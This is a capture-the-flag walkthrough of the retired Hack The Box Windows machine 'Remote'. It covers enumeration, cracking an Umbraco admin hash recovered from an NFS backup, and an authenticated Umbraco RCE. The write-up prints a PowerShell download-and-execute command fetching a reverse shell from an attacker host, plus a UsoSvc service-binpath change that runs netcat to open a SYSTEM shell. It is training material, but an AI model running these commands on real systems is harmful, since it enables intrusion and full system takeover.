Remote

Name: Remote
Release Date: 21 Mar 2020
Retire Date: 05 Sep 2020
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
enjloezz 00 days, 00 hours, 57 mins, 49 seconds
qtc 00 days, 01 hours, 04 mins, 46 seconds
Creator: mrb3n
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180

 
$ nmap -sC -sV -Pn -p- -oA ./Remote 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 13:24 EDT
Nmap scan report for 10.10.10.180
Host is up (0.058s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m48s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-05T17:31:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 274.31 seconds

 

We've got FTP, HTTP, SMB, and a few others.  It looks like FTP allows anonymous login, but I'll save you some time and tell you that there's no files there we can play with.  My guess this early into the box is that we'll be having to PUT something there instead of GETting something.  So, let's check out the HTTP service, which is a Looney Toons "Acme Products" page.  Fire up gobuster and see what's behind the scenes.

 
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.180
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.180
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/05 13:30:06 Starting gobuster
===============================================================
/1111 (Status: 200)
/Home (Status: 200)
/Blog (Status: 200)
/Products (Status: 200)
/People (Status: 200)
/blog (Status: 200)
/contact (Status: 200)
/home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/person (Status: 200)
/products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/09/05 13:36:11 Finished
===============================================================

 

OK, Gobuster is throwing a LOT of header errors and timeouts, but if you yank those out (although the full list is in the CTB file, you'll notice an umbraco folder, meaning this is using Umbraco as a CMS.  Unfortunately for us, all the traditional default credential combos fail, so this looks like it might be another dead end/rabbit hole, or we're missing a crucial piece of information to log in.  So, let's see if SMB/NFS shares give us anything useful, cause I've come up empty so far.

SMB is a bust without some credentials, but:

 

sudo showmount -e 10.10.10.180

 

gives us a /site_backups (everyone) listing.  FINALLY, we're getting somewhere.  Let's mount that.  And Yes, I know I oops'd the backups vs backup, but hey, nobody's perfect XD

Digging through all that backup data, and a little bit of Google Fu, we discover that the admin credentials are stored in the Umbraco.sdf file.  That file is locate in site_backup/App_Data/Umbraco.sdf.  Don't bother cat'ting it. Try running strings on it instead.  Strings is readable, but there are WAY too many to dig through.  So, how do we filter it down?  grep is always your friend.

 

strings Umbraco.sdf | grep admin

 
$ strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "smith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "smith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "ssmith" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "ssmith" umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" 192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" 192.168.195.1User "admin" umbraco/user/password/changepassword change
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" umbraco/user/sign-in/loginlogin success
User "admin" 192.168.195.1User "admin" umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
 

And as much as I despise Christmas music, I'm singing Do You See What I See.

 

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
 

I need the first hash side of that: b8be16afba8c314ad33d812f22a04991b90e2aaa and then we can bust it open with ole John.

 

So, vi, nano, echo or however that hash into a file that you can then input into john.  I use vi.  Then:

 

john hash --format=RAW-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt

 

and you get baconandcheese as the password.  ummmmmm bacon...... Ok I'm back.

 
kali@kali:~/Desktop/remote$ vi hash
kali@kali:~/Desktop/remote$ sudo john hash --format=RAW-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for kali: 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)
1g 0:00:00:00 DONE (2020-09-05 13:59) 1.449g/s 14237Kp/s 14237Kc/s 14237KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
kali@kali:~/Desktop/remote$ 
 

Jump back to that Umbraco page and user admin@htb.local:baconandcheese as the credentials and you have yourself a foothold in the CMS.  I will fully admit that I know jack squat about Umbraco.  So, where do you go when you need help?  The HELP menu!  <These Dad jokes just keep getting worse. I should stop, but I'm irresistably drawn to being a smartass>

Anyway. The Help menu shows us that the version running is 7.12.4 and searchsploit shows that 7.12.4 is vulnerable to an Authenticated RCE exploit.

I tried several times to get that exploit to work and finally ended up using the one at:

 

wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py

 

Create or use a prebuilt Powershell Reverse Shell one-liner.  I named mine powerreverse.ps1.  Eventually, I fired up nc -lvnp 4444

 

And then ran the exploit from noraj:

 

sudo python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13/powerreverse.ps1')"

 

Finally, a shell.  It's a crap one, but it's there.  Now, let's look around.  The iis apppool has an interesting ability to impersonate clients.  Let's check into that.

Now we get complicated.  There looks to be multiple ways to privesc.  I'm going to start with UsoSvc because I remember seeing it on PayloadAllTheThings.

 

So, here's the progression of the privesc.  Copy the nc.exe into your working folder.  It is located in /usr/share/windows-resources/binaries/nc.exe. 

 

  1. invoke-webrequest -Uri http://10.10.14.13/nc.exe -OutFile nc.exe
  2. sc.exe stop usosvc
  3. sc.exe config UsoSvc binpath="C:\Users\Public\nc.exe 10.10.14.13 4445 -e cmd.exe"
  4. <Attacking machine> nc -lvnp 4445
  5. sc.exe start usosvc

 

Instantly, you will have an NT Authority/SYSTEM Shell!  Move fast though, it doesn't last long.  Grab your flags and you're finished.